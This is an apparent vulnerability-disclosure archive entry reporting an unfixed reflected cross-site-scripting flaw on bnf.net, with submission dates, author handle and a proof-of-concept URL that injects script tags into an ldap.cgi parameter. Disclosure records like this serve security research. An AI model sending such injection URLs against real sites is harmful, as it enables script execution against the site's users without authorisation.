Security researcher skathgh420, has submitted on 01/03/2009 a cross-site-scripting (XSS) vulnerability affecting bnf.net, which at the time of submission ranked 0 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 01/03/2009 |
Date published: 18/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: skathgh420 |
Domain: bnf.net |
Category: XSS |
Pagerank: 0 |
URL: http://bnf.net/ldap.cgi?asdfsEMAIL=%22%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E%3Cscript%3Ealert%3Cs cript%3Ealert(1337)%3C%2Fscript%3E%3Cscript%3Ealert(1337)%3C%2Fscript%3E(1337)%3Cscript%3Ealert(1337 )%3C%2Fscript%3E%3C%2Fscript%3E&Login=Login&ENC40f915e0809bead798ad632cbca6392b=d15c1cf5a94856ed5f13 10b90c808216&ENC444aa218f07946c3=e7512721cdfdc7096ce6013d27b1153403635a3baa36ddca2fa27d2ff7981f6e |
Click here to view the mirror
|
|
|